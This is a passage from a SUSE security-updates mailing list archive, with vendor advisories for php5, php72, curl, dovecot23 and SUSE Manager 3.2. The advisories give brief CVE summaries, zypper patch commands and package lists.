   - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64):
      php5-debuginfo-5.5.14-109.51.6
      php5-debugsource-5.5.14-109.51.6
      php5-devel-5.5.14-109.51.6
   - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64):
      php5-debuginfo-5.5.14-109.51.6
      php5-debugsource-5.5.14-109.51.6
      php5-devel-5.5.14-109.51.6
   - SUSE Linux Enterprise Module for Web Scripting 12 (aarch64 ppc64le s390x x86_64):
      apache2-mod_php5-5.5.14-109.51.6
      apache2-mod_php5-debuginfo-5.5.14-109.51.6
      php5-5.5.14-109.51.6
      php5-bcmath-5.5.14-109.51.6
      php5-bcmath-debuginfo-5.5.14-109.51.6
      php5-bz2-5.5.14-109.51.6
      php5-bz2-debuginfo-5.5.14-109.51.6
      php5-calendar-5.5.14-109.51.6
      php5-calendar-debuginfo-5.5.14-109.51.6
      php5-ctype-5.5.14-109.51.6
      php5-ctype-debuginfo-5.5.14-109.51.6
      php5-curl-5.5.14-109.51.6
      php5-curl-debuginfo-5.5.14-109.51.6
      php5-dba-5.5.14-109.51.6
      php5-dba-debuginfo-5.5.14-109.51.6
      php5-debuginfo-5.5.14-109.51.6
      php5-debugsource-5.5.14-109.51.6
      php5-dom-5.5.14-109.51.6
      php5-dom-debuginfo-5.5.14-109.51.6
      php5-enchant-5.5.14-109.51.6
      php5-enchant-debuginfo-5.5.14-109.51.6
      php5-exif-5.5.14-109.51.6
      php5-exif-debuginfo-5.5.14-109.51.6
      php5-fastcgi-5.5.14-109.51.6
      php5-fastcgi-debuginfo-5.5.14-109.51.6
      php5-fileinfo-5.5.14-109.51.6
      php5-fileinfo-debuginfo-5.5.14-109.51.6
      php5-fpm-5.5.14-109.51.6
      php5-fpm-debuginfo-5.5.14-109.51.6
      php5-ftp-5.5.14-109.51.6
      php5-ftp-debuginfo-5.5.14-109.51.6
      php5-gd-5.5.14-109.51.6
      php5-gd-debuginfo-5.5.14-109.51.6
      php5-gettext-5.5.14-109.51.6
      php5-gettext-debuginfo-5.5.14-109.51.6
      php5-gmp-5.5.14-109.51.6
      php5-gmp-debuginfo-5.5.14-109.51.6
      php5-iconv-5.5.14-109.51.6
      php5-iconv-debuginfo-5.5.14-109.51.6
      php5-imap-5.5.14-109.51.6
      php5-imap-debuginfo-5.5.14-109.51.6
      php5-intl-5.5.14-109.51.6
      php5-intl-debuginfo-5.5.14-109.51.6
      php5-json-5.5.14-109.51.6
      php5-json-debuginfo-5.5.14-109.51.6
      php5-ldap-5.5.14-109.51.6
      php5-ldap-debuginfo-5.5.14-109.51.6
      php5-mbstring-5.5.14-109.51.6
      php5-mbstring-debuginfo-5.5.14-109.51.6
      php5-mcrypt-5.5.14-109.51.6
      php5-mcrypt-debuginfo-5.5.14-109.51.6
      php5-mysql-5.5.14-109.51.6
      php5-mysql-debuginfo-5.5.14-109.51.6
      php5-odbc-5.5.14-109.51.6
      php5-odbc-debuginfo-5.5.14-109.51.6
      php5-opcache-5.5.14-109.51.6
      php5-opcache-debuginfo-5.5.14-109.51.6
      php5-openssl-5.5.14-109.51.6
      php5-openssl-debuginfo-5.5.14-109.51.6
      php5-pcntl-5.5.14-109.51.6
      php5-pcntl-debuginfo-5.5.14-109.51.6
      php5-pdo-5.5.14-109.51.6
      php5-pdo-debuginfo-5.5.14-109.51.6
      php5-pgsql-5.5.14-109.51.6
      php5-pgsql-debuginfo-5.5.14-109.51.6
      php5-phar-5.5.14-109.51.6
      php5-phar-debuginfo-5.5.14-109.51.6
      php5-posix-5.5.14-109.51.6
      php5-posix-debuginfo-5.5.14-109.51.6
      php5-pspell-5.5.14-109.51.6
      php5-pspell-debuginfo-5.5.14-109.51.6
      php5-shmop-5.5.14-109.51.6
      php5-shmop-debuginfo-5.5.14-109.51.6
      php5-snmp-5.5.14-109.51.6
      php5-snmp-debuginfo-5.5.14-109.51.6
      php5-soap-5.5.14-109.51.6
      php5-soap-debuginfo-5.5.14-109.51.6
      php5-sockets-5.5.14-109.51.6
      php5-sockets-debuginfo-5.5.14-109.51.6
      php5-sqlite-5.5.14-109.51.6
      php5-sqlite-debuginfo-5.5.14-109.51.6
      php5-suhosin-5.5.14-109.51.6
      php5-suhosin-debuginfo-5.5.14-109.51.6
      php5-sysvmsg-5.5.14-109.51.6
      php5-sysvmsg-debuginfo-5.5.14-109.51.6
      php5-sysvsem-5.5.14-109.51.6
      php5-sysvsem-debuginfo-5.5.14-109.51.6
      php5-sysvshm-5.5.14-109.51.6
      php5-sysvshm-debuginfo-5.5.14-109.51.6
      php5-tokenizer-5.5.14-109.51.6
      php5-tokenizer-debuginfo-5.5.14-109.51.6
      php5-wddx-5.5.14-109.51.6
      php5-wddx-debuginfo-5.5.14-109.51.6
      php5-xmlreader-5.5.14-109.51.6
      php5-xmlreader-debuginfo-5.5.14-109.51.6
      php5-xmlrpc-5.5.14-109.51.6
      php5-xmlrpc-debuginfo-5.5.14-109.51.6
      php5-xmlwriter-5.5.14-109.51.6
      php5-xmlwriter-debuginfo-5.5.14-109.51.6
      php5-xsl-5.5.14-109.51.6
      php5-xsl-debuginfo-5.5.14-109.51.6
      php5-zip-5.5.14-109.51.6
      php5-zip-debuginfo-5.5.14-109.51.6
      php5-zlib-5.5.14-109.51.6
      php5-zlib-debuginfo-5.5.14-109.51.6
   - SUSE Linux Enterprise Module for Web Scripting 12 (noarch):
      php5-pear-5.5.14-109.51.6

References:

   https://www.suse.com/security/cve/CVE-2018-20783.html
   https://www.suse.com/security/cve/CVE-2019-9020.html
   https://www.suse.com/security/cve/CVE-2019-9021.html
   https://www.suse.com/security/cve/CVE-2019-9023.html
   https://www.suse.com/security/cve/CVE-2019-9024.html
   https://www.suse.com/security/cve/CVE-2019-9641.html
   https://bugzilla.suse.com/1126711
   https://bugzilla.suse.com/1126713
   https://bugzilla.suse.com/1126821
   https://bugzilla.suse.com/1126823
   https://bugzilla.suse.com/1127122
   https://bugzilla.suse.com/1128722

From sle-security-updates at lists.suse.com Tue Apr 23 04:10:25 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Tue, 23 Apr 2019 12:10:25 +0200 (CEST)
Subject: SUSE-SU-2019:0988-1: moderate: Security update for php72
Message-ID: <20190423101025.6C061FEBC@maintenance.suse.de>

SUSE Security Update: Security update for php72
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0988-1
Rating:             moderate
References:         #1128883 #1128886 #1128887 #1128889 #1128892
Cross-References:   CVE-2019-9637 CVE-2019-9638 CVE-2019-9639 CVE-2019-9640 CVE-2019-9675
Affected Products:
                    SUSE Linux Enterprise Software Development Kit 12-SP4
                    SUSE Linux Enterprise Software Development Kit 12-SP3
                    SUSE Linux Enterprise Module for Web Scripting 12
______________________________________________________________________________

   An update that fixes 5 vulnerabilities is now available.
Description:

   This update for php72 fixes the following issues:

   - CVE-2019-9637: Due to the way rename() across filesystems is implemented, it was possible for the file being renamed to be briefly available with the wrong permissions while the rename was ongoing, enabling unauthorized users to access the data (bsc#1128892).
   - CVE-2019-9675: phar_tar_writeheaders_int in ext/phar/tar.c has a buffer overflow via a long link value. NOTE: The vendor indicates that the link value is used only when an archive contains a symlink, which currently cannot happen: "This issue allows theoretical compromise of security, but a practical attack is usually impossible." (bsc#1128886)
   - CVE-2019-9638: An issue was discovered in the EXIF component in PHP. There was an uninitialized read in exif_process_IFD_in_MAKERNOTE because of mishandling the maker_note->offset relationship to value_len (bsc#1128889).
   - CVE-2019-9639: An issue was discovered in the EXIF component in PHP. There was an uninitialized read in exif_process_IFD_in_MAKERNOTE because of mishandling the data_len variable (bsc#1128887).
   - CVE-2019-9640: An issue was discovered in the EXIF component in PHP. There was an invalid read in exif_process_SOFn (bsc#1128883).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Software Development Kit 12-SP4:
      zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-988=1
   - SUSE Linux Enterprise Software Development Kit 12-SP3:
      zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-988=1
   - SUSE Linux Enterprise Module for Web Scripting 12:
      zypper in -t patch SUSE-SLE-Module-Web-Scripting-12-2019-988=1

Package List:

   - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64):
      php72-debuginfo-7.2.5-1.10.1
      php72-debugsource-7.2.5-1.10.1
      php72-devel-7.2.5-1.10.1
   - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64):
      php72-debuginfo-7.2.5-1.10.1
      php72-debugsource-7.2.5-1.10.1
      php72-devel-7.2.5-1.10.1
   - SUSE Linux Enterprise Module for Web Scripting 12 (aarch64 ppc64le s390x x86_64):
      apache2-mod_php72-7.2.5-1.10.1
      apache2-mod_php72-debuginfo-7.2.5-1.10.1
      php72-7.2.5-1.10.1
      php72-bcmath-7.2.5-1.10.1
      php72-bcmath-debuginfo-7.2.5-1.10.1
      php72-bz2-7.2.5-1.10.1
      php72-bz2-debuginfo-7.2.5-1.10.1
      php72-calendar-7.2.5-1.10.1
      php72-calendar-debuginfo-7.2.5-1.10.1
      php72-ctype-7.2.5-1.10.1
      php72-ctype-debuginfo-7.2.5-1.10.1
      php72-curl-7.2.5-1.10.1
      php72-curl-debuginfo-7.2.5-1.10.1
      php72-dba-7.2.5-1.10.1
      php72-dba-debuginfo-7.2.5-1.10.1
      php72-debuginfo-7.2.5-1.10.1
      php72-debugsource-7.2.5-1.10.1
      php72-dom-7.2.5-1.10.1
      php72-dom-debuginfo-7.2.5-1.10.1
      php72-enchant-7.2.5-1.10.1
      php72-enchant-debuginfo-7.2.5-1.10.1
      php72-exif-7.2.5-1.10.1
      php72-exif-debuginfo-7.2.5-1.10.1
      php72-fastcgi-7.2.5-1.10.1
      php72-fastcgi-debuginfo-7.2.5-1.10.1
      php72-fileinfo-7.2.5-1.10.1
      php72-fileinfo-debuginfo-7.2.5-1.10.1
      php72-fpm-7.2.5-1.10.1
      php72-fpm-debuginfo-7.2.5-1.10.1
      php72-ftp-7.2.5-1.10.1
      php72-ftp-debuginfo-7.2.5-1.10.1
      php72-gd-7.2.5-1.10.1
      php72-gd-debuginfo-7.2.5-1.10.1
      php72-gettext-7.2.5-1.10.1
      php72-gettext-debuginfo-7.2.5-1.10.1
      php72-gmp-7.2.5-1.10.1
      php72-gmp-debuginfo-7.2.5-1.10.1
      php72-iconv-7.2.5-1.10.1
      php72-iconv-debuginfo-7.2.5-1.10.1
      php72-imap-7.2.5-1.10.1
      php72-imap-debuginfo-7.2.5-1.10.1
      php72-intl-7.2.5-1.10.1
      php72-intl-debuginfo-7.2.5-1.10.1
      php72-json-7.2.5-1.10.1
      php72-json-debuginfo-7.2.5-1.10.1
      php72-ldap-7.2.5-1.10.1
      php72-ldap-debuginfo-7.2.5-1.10.1
      php72-mbstring-7.2.5-1.10.1
      php72-mbstring-debuginfo-7.2.5-1.10.1
      php72-mysql-7.2.5-1.10.1
      php72-mysql-debuginfo-7.2.5-1.10.1
      php72-odbc-7.2.5-1.10.1
      php72-odbc-debuginfo-7.2.5-1.10.1
      php72-opcache-7.2.5-1.10.1
      php72-opcache-debuginfo-7.2.5-1.10.1
      php72-openssl-7.2.5-1.10.1
      php72-openssl-debuginfo-7.2.5-1.10.1
      php72-pcntl-7.2.5-1.10.1
      php72-pcntl-debuginfo-7.2.5-1.10.1
      php72-pdo-7.2.5-1.10.1
      php72-pdo-debuginfo-7.2.5-1.10.1
      php72-pgsql-7.2.5-1.10.1
      php72-pgsql-debuginfo-7.2.5-1.10.1
      php72-phar-7.2.5-1.10.1
      php72-phar-debuginfo-7.2.5-1.10.1
      php72-posix-7.2.5-1.10.1
      php72-posix-debuginfo-7.2.5-1.10.1
      php72-pspell-7.2.5-1.10.1
      php72-pspell-debuginfo-7.2.5-1.10.1
      php72-readline-7.2.5-1.10.1
      php72-readline-debuginfo-7.2.5-1.10.1
      php72-shmop-7.2.5-1.10.1
      php72-shmop-debuginfo-7.2.5-1.10.1
      php72-snmp-7.2.5-1.10.1
      php72-snmp-debuginfo-7.2.5-1.10.1
      php72-soap-7.2.5-1.10.1
      php72-soap-debuginfo-7.2.5-1.10.1
      php72-sockets-7.2.5-1.10.1
      php72-sockets-debuginfo-7.2.5-1.10.1
      php72-sqlite-7.2.5-1.10.1
      php72-sqlite-debuginfo-7.2.5-1.10.1
      php72-sysvmsg-7.2.5-1.10.1
      php72-sysvmsg-debuginfo-7.2.5-1.10.1
      php72-sysvsem-7.2.5-1.10.1
      php72-sysvsem-debuginfo-7.2.5-1.10.1
      php72-sysvshm-7.2.5-1.10.1
      php72-sysvshm-debuginfo-7.2.5-1.10.1
      php72-tidy-7.2.5-1.10.1
      php72-tidy-debuginfo-7.2.5-1.10.1
      php72-tokenizer-7.2.5-1.10.1
      php72-tokenizer-debuginfo-7.2.5-1.10.1
      php72-wddx-7.2.5-1.10.1
      php72-wddx-debuginfo-7.2.5-1.10.1
      php72-xmlreader-7.2.5-1.10.1
      php72-xmlreader-debuginfo-7.2.5-1.10.1
      php72-xmlrpc-7.2.5-1.10.1
      php72-xmlrpc-debuginfo-7.2.5-1.10.1
      php72-xmlwriter-7.2.5-1.10.1
      php72-xmlwriter-debuginfo-7.2.5-1.10.1
      php72-xsl-7.2.5-1.10.1
      php72-xsl-debuginfo-7.2.5-1.10.1
      php72-zip-7.2.5-1.10.1
      php72-zip-debuginfo-7.2.5-1.10.1
      php72-zlib-7.2.5-1.10.1
      php72-zlib-debuginfo-7.2.5-1.10.1
   - SUSE Linux Enterprise Module for Web Scripting 12 (noarch):
      php72-pear-7.2.5-1.10.1
      php72-pear-Archive_Tar-7.2.5-1.10.1

References:

   https://www.suse.com/security/cve/CVE-2019-9637.html
   https://www.suse.com/security/cve/CVE-2019-9638.html
   https://www.suse.com/security/cve/CVE-2019-9639.html
   https://www.suse.com/security/cve/CVE-2019-9640.html
   https://www.suse.com/security/cve/CVE-2019-9675.html
   https://bugzilla.suse.com/1128883
   https://bugzilla.suse.com/1128886
   https://bugzilla.suse.com/1128887
   https://bugzilla.suse.com/1128889
   https://bugzilla.suse.com/1128892

From sle-security-updates at lists.suse.com Tue Apr 23 16:09:11 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Wed, 24 Apr 2019 00:09:11 +0200 (CEST)
Subject: SUSE-SU-2019:0996-1: important: Security update for curl
Message-ID: <20190423220911.754F7FDF1@maintenance.suse.de>

SUSE Security Update: Security update for curl
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0996-1
Rating:             important
References:         #1112758 #1131886
Cross-References:   CVE-2018-16839
Affected Products:
                    SUSE OpenStack Cloud 7
                    SUSE Linux Enterprise Software Development Kit 12-SP3
                    SUSE Linux Enterprise Server for SAP 12-SP2
                    SUSE Linux Enterprise Server for SAP 12-SP1
                    SUSE Linux Enterprise Server 12-SP3
                    SUSE Linux Enterprise Server 12-SP2-LTSS
                    SUSE Linux Enterprise Server 12-SP2-BCL
                    SUSE Linux Enterprise Server 12-SP1-LTSS
                    SUSE Linux Enterprise Server 12-LTSS
                    SUSE Linux Enterprise Desktop 12-SP3
                    SUSE Enterprise Storage 4
                    SUSE CaaS Platform ALL
                    SUSE CaaS Platform 3.0
                    OpenStack Cloud Magnum Orchestration 7
______________________________________________________________________________

   An update that solves one vulnerability and has one errata is now available.
Description:

   This update for curl fixes the following issues:

   Security issue fixed:

   - CVE-2018-16839: Fixed a buffer overflow in the SASL authentication code (bsc#1112758).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE OpenStack Cloud 7:
      zypper in -t patch SUSE-OpenStack-Cloud-7-2019-996=1
   - SUSE Linux Enterprise Software Development Kit 12-SP3:
      zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-996=1
   - SUSE Linux Enterprise Server for SAP 12-SP2:
      zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-996=1
   - SUSE Linux Enterprise Server for SAP 12-SP1:
      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-996=1
   - SUSE Linux Enterprise Server 12-SP3:
      zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-996=1
   - SUSE Linux Enterprise Server 12-SP2-LTSS:
      zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-996=1
   - SUSE Linux Enterprise Server 12-SP2-BCL:
      zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-996=1
   - SUSE Linux Enterprise Server 12-SP1-LTSS:
      zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-996=1
   - SUSE Linux Enterprise Server 12-LTSS:
      zypper in -t patch SUSE-SLE-SERVER-12-2019-996=1
   - SUSE Linux Enterprise Desktop 12-SP3:
      zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-996=1
   - SUSE Enterprise Storage 4:
      zypper in -t patch SUSE-Storage-4-2019-996=1
   - SUSE CaaS Platform ALL:
      To install this update, use the SUSE CaaS Platform Velum dashboard. It will inform you if it detects new updates and let you then trigger updating of the complete cluster in a controlled way.
   - SUSE CaaS Platform 3.0:
      To install this update, use the SUSE CaaS Platform Velum dashboard. It will inform you if it detects new updates and let you then trigger updating of the complete cluster in a controlled way.
   - OpenStack Cloud Magnum Orchestration 7:
      zypper in -t patch SUSE-OpenStack-Cloud-Magnum-Orchestration-7-2019-996=1

Package List:

   - SUSE OpenStack Cloud 7 (s390x x86_64):
      curl-7.37.0-37.37.1
      curl-debuginfo-7.37.0-37.37.1
      curl-debugsource-7.37.0-37.37.1
      libcurl4-32bit-7.37.0-37.37.1
      libcurl4-7.37.0-37.37.1
      libcurl4-debuginfo-32bit-7.37.0-37.37.1
      libcurl4-debuginfo-7.37.0-37.37.1
   - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64):
      curl-debuginfo-7.37.0-37.37.1
      curl-debugsource-7.37.0-37.37.1
      libcurl-devel-7.37.0-37.37.1
   - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64):
      curl-7.37.0-37.37.1
      curl-debuginfo-7.37.0-37.37.1
      curl-debugsource-7.37.0-37.37.1
      libcurl4-7.37.0-37.37.1
      libcurl4-debuginfo-7.37.0-37.37.1
   - SUSE Linux Enterprise Server for SAP 12-SP2 (x86_64):
      libcurl4-32bit-7.37.0-37.37.1
      libcurl4-debuginfo-32bit-7.37.0-37.37.1
   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):
      curl-7.37.0-37.37.1
      curl-debuginfo-7.37.0-37.37.1
      curl-debugsource-7.37.0-37.37.1
      libcurl4-32bit-7.37.0-37.37.1
      libcurl4-7.37.0-37.37.1
      libcurl4-debuginfo-32bit-7.37.0-37.37.1
      libcurl4-debuginfo-7.37.0-37.37.1
   - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64):
      curl-7.37.0-37.37.1
      curl-debuginfo-7.37.0-37.37.1
      curl-debugsource-7.37.0-37.37.1
      libcurl4-7.37.0-37.37.1
      libcurl4-debuginfo-7.37.0-37.37.1
   - SUSE Linux Enterprise Server 12-SP3 (s390x x86_64):
      libcurl4-32bit-7.37.0-37.37.1
      libcurl4-debuginfo-32bit-7.37.0-37.37.1
   - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64):
      curl-7.37.0-37.37.1
      curl-debuginfo-7.37.0-37.37.1
      curl-debugsource-7.37.0-37.37.1
      libcurl4-7.37.0-37.37.1
      libcurl4-debuginfo-7.37.0-37.37.1
   - SUSE Linux Enterprise Server 12-SP2-LTSS (s390x x86_64):
      libcurl4-32bit-7.37.0-37.37.1
      libcurl4-debuginfo-32bit-7.37.0-37.37.1
   - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64):
      curl-7.37.0-37.37.1
      curl-debuginfo-7.37.0-37.37.1
      curl-debugsource-7.37.0-37.37.1
      libcurl4-32bit-7.37.0-37.37.1
      libcurl4-7.37.0-37.37.1
      libcurl4-debuginfo-32bit-7.37.0-37.37.1
      libcurl4-debuginfo-7.37.0-37.37.1
   - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64):
      curl-7.37.0-37.37.1
      curl-debuginfo-7.37.0-37.37.1
      curl-debugsource-7.37.0-37.37.1
      libcurl4-7.37.0-37.37.1
      libcurl4-debuginfo-7.37.0-37.37.1
   - SUSE Linux Enterprise Server 12-SP1-LTSS (s390x x86_64):
      libcurl4-32bit-7.37.0-37.37.1
      libcurl4-debuginfo-32bit-7.37.0-37.37.1
   - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64):
      curl-7.37.0-37.37.1
      curl-debuginfo-7.37.0-37.37.1
      curl-debugsource-7.37.0-37.37.1
      libcurl4-7.37.0-37.37.1
      libcurl4-debuginfo-7.37.0-37.37.1
   - SUSE Linux Enterprise Server 12-LTSS (s390x x86_64):
      libcurl4-32bit-7.37.0-37.37.1
      libcurl4-debuginfo-32bit-7.37.0-37.37.1
   - SUSE Linux Enterprise Desktop 12-SP3 (x86_64):
      curl-7.37.0-37.37.1
      curl-debuginfo-7.37.0-37.37.1
      curl-debugsource-7.37.0-37.37.1
      libcurl4-32bit-7.37.0-37.37.1
      libcurl4-7.37.0-37.37.1
      libcurl4-debuginfo-32bit-7.37.0-37.37.1
      libcurl4-debuginfo-7.37.0-37.37.1
   - SUSE Enterprise Storage 4 (x86_64):
      curl-7.37.0-37.37.1
      curl-debuginfo-7.37.0-37.37.1
      curl-debugsource-7.37.0-37.37.1
      libcurl4-32bit-7.37.0-37.37.1
      libcurl4-7.37.0-37.37.1
      libcurl4-debuginfo-32bit-7.37.0-37.37.1
      libcurl4-debuginfo-7.37.0-37.37.1
   - SUSE CaaS Platform ALL (x86_64):
      curl-7.37.0-37.37.1
      curl-debuginfo-7.37.0-37.37.1
      curl-debugsource-7.37.0-37.37.1
      libcurl4-7.37.0-37.37.1
      libcurl4-debuginfo-7.37.0-37.37.1
   - SUSE CaaS Platform 3.0 (x86_64):
      curl-7.37.0-37.37.1
      curl-debuginfo-7.37.0-37.37.1
      curl-debugsource-7.37.0-37.37.1
      libcurl4-7.37.0-37.37.1
      libcurl4-debuginfo-7.37.0-37.37.1
   - OpenStack Cloud Magnum Orchestration 7 (x86_64):
      curl-7.37.0-37.37.1
      curl-debuginfo-7.37.0-37.37.1
      curl-debugsource-7.37.0-37.37.1
      libcurl4-7.37.0-37.37.1
      libcurl4-debuginfo-7.37.0-37.37.1

References:

   https://www.suse.com/security/cve/CVE-2018-16839.html
   https://bugzilla.suse.com/1112758
   https://bugzilla.suse.com/1131886

From sle-security-updates at lists.suse.com Tue Apr 23 16:09:56 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Wed, 24 Apr 2019 00:09:56 +0200 (CEST)
Subject: SUSE-SU-2019:0997-1: important: Security update for dovecot23
Message-ID: <20190423220956.641B1FDF1@maintenance.suse.de>

SUSE Security Update: Security update for dovecot23
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0997-1
Rating:             important
References:         #1132501
Cross-References:   CVE-2019-10691
Affected Products:
                    SUSE Linux Enterprise Module for Server Applications 15
______________________________________________________________________________

   An update that fixes one vulnerability is now available.

Description:

   This update for dovecot23 fixes the following issues:

   Security issue fixed:

   - CVE-2019-10691: Fixed a denial of service via reachable assertion when processing invalid UTF-8 characters (bsc#1132501).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Module for Server Applications 15:
      zypper in -t patch SUSE-SLE-Module-Server-Applications-15-2019-997=1

Package List:

   - SUSE Linux Enterprise Module for Server Applications 15 (aarch64 ppc64le s390x x86_64):
      dovecot23-2.3.3-4.13.1
      dovecot23-backend-mysql-2.3.3-4.13.1
      dovecot23-backend-mysql-debuginfo-2.3.3-4.13.1
      dovecot23-backend-pgsql-2.3.3-4.13.1
      dovecot23-backend-pgsql-debuginfo-2.3.3-4.13.1
      dovecot23-backend-sqlite-2.3.3-4.13.1
      dovecot23-backend-sqlite-debuginfo-2.3.3-4.13.1
      dovecot23-debuginfo-2.3.3-4.13.1
      dovecot23-debugsource-2.3.3-4.13.1
      dovecot23-devel-2.3.3-4.13.1
      dovecot23-fts-2.3.3-4.13.1
      dovecot23-fts-debuginfo-2.3.3-4.13.1
      dovecot23-fts-lucene-2.3.3-4.13.1
      dovecot23-fts-lucene-debuginfo-2.3.3-4.13.1
      dovecot23-fts-solr-2.3.3-4.13.1
      dovecot23-fts-solr-debuginfo-2.3.3-4.13.1
      dovecot23-fts-squat-2.3.3-4.13.1
      dovecot23-fts-squat-debuginfo-2.3.3-4.13.1

References:

   https://www.suse.com/security/cve/CVE-2019-10691.html
   https://bugzilla.suse.com/1132501

From sle-security-updates at lists.suse.com Wed Apr 24 07:18:09 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Wed, 24 Apr 2019 15:18:09 +0200 (CEST)
Subject: SUSE-SU-2019:1006-1: moderate: Security update for several packages related to SUSE Manager 3.2
Message-ID: <20190424131810.009EAFDF2@maintenance.suse.de>

SUSE Security Update: Security update for several packages related to SUSE Manager 3.2
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:1006-1
Rating:             moderate
References:         #1109316 #1120242 #1121195 #1122230 #1122381 #1122837 #1124290 #1125600 #1125744 #1126075 #1126099 #1126518 #1127542 #1128228 #1128724 #1128781 #1129765 #1129851 #1129956 #1130658 #1131490 #1131677 #1131721 #1132579
Cross-References:   CVE-2017-7957
Affected Products:
                    SUSE Manager Server 3.2
                    SUSE Manager Proxy 3.2
______________________________________________________________________________

   An update that solves one vulnerability and has 23 fixes is now available.

Description:

   This consolidated update includes multiple patchinfos for SUSE Manager Server and Proxy.

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Manager Server 3.2:
      zypper in -t patch SUSE-SUSE-Manager-Server-3.2-2019-1006=1
   - SUSE Manager Proxy 3.2:
      zypper in -t patch SUSE-SUSE-Manager-Proxy-3.2-2019-1006=1

Package List:

   - SUSE Manager Server 3.2 (ppc64le s390x x86_64):
      reprepro-5.3.0-2.3.3
      smdba-1.6.4-0.3.9.3
      spacewalk-branding-2.8.5.15-3.19.3
      susemanager-3.2.17-3.22.4
      susemanager-tools-3.2.17-3.22.4
   - SUSE Manager Server 3.2 (noarch):
      apache-commons-lang3-3.4-3.3.3
      cobbler-2.6.6-6.16.3
      drools-7.17.0-3.3.3
      guava-27.0.1-3.3.3
      jade4j-1.0.7-3.3.3
      kie-api-7.17.0-3.3.3
      kie-soup-7.17.0.Final-2.3.3
      optaplanner-7.17.0-3.3.3
      py26-compat-salt-2016.11.10-6.21.3
      python2-spacewalk-certs-tools-2.8.8.7-3.6.3
      spacecmd-2.8.25.10-3.20.3
      spacewalk-admin-2.8.4.4-3.6.3
      spacewalk-backend-2.8.57.14-3.25.3
      spacewalk-backend-app-2.8.57.14-3.25.3
      spacewalk-backend-applet-2.8.57.14-3.25.3
      spacewalk-backend-config-files-2.8.57.14-3.25.3
      spacewalk-backend-config-files-common-2.8.57.14-3.25.3
      spacewalk-backend-config-files-tool-2.8.57.14-3.25.3
      spacewalk-backend-iss-2.8.57.14-3.25.3
      spacewalk-backend-iss-export-2.8.57.14-3.25.3
      spacewalk-backend-libs-2.8.57.14-3.25.3
      spacewalk-backend-package-push-server-2.8.57.14-3.25.3
      spacewalk-backend-server-2.8.57.14-3.25.3
      spacewalk-backend-sql-2.8.57.14-3.25.3
      spacewalk-backend-sql-oracle-2.8.57.14-3.25.3
      spacewalk-backend-sql-postgresql-2.8.57.14-3.25.3
      spacewalk-backend-tools-2.8.57.14-3.25.3
      spacewalk-backend-xml-export-libs-2.8.57.14-3.25.3
      spacewalk-backend-xmlrpc-2.8.57.14-3.25.3
      spacewalk-base-2.8.7.15-3.24.3
      spacewalk-base-minimal-2.8.7.15-3.24.3
      spacewalk-base-minimal-config-2.8.7.15-3.24.3
      spacewalk-certs-tools-2.8.8.7-3.6.3
      spacewalk-html-2.8.7.15-3.24.3
      spacewalk-java-2.8.78.21-3.29.1
      spacewalk-java-config-2.8.78.21-3.29.1
      spacewalk-java-lib-2.8.78.21-3.29.1
      spacewalk-java-oracle-2.8.78.21-3.29.1
      spacewalk-java-postgresql-2.8.78.21-3.29.1
      spacewalk-taskomatic-2.8.78.21-3.29.1
      subscription-matcher-0.23-4.12.3
      susemanager-schema-3.2.18-3.22.3
      susemanager-sls-3.2.23-3.26.3
      susemanager-sync-data-3.2.14-3.20.3
      susemanager-web-libs-2.8.7.15-3.24.3
      xstream-1.4.10-4.3.3
   - SUSE Manager Proxy 3.2 (noarch):
      python2-spacewalk-certs-tools-2.8.8.7-3.6.3
      spacewalk-backend-2.8.57.14-3.25.3
      spacewalk-backend-libs-2.8.57.14-3.25.3
      spacewalk-base-minimal-2.8.7.15-3.24.3
      spacewalk-base-minimal-config-2.8.7.15-3.24.3
      spacewalk-certs-tools-2.8.8.7-3.6.3
      susemanager-web-libs-2.8.7.15-3.24.3

References:

   https://www.suse.com/security/cve/CVE-2017-7957.html
   https://bugzilla.suse.com/1109316
   https://bugzilla.suse.com/1120242
   https://bugzilla.suse.com/1121195
   https://bugzilla.suse.com/1122230
   https://bugzilla.suse.com/1122381
   https://bugzilla.suse.com/1122837
   https://bugzilla.suse.com/1124290
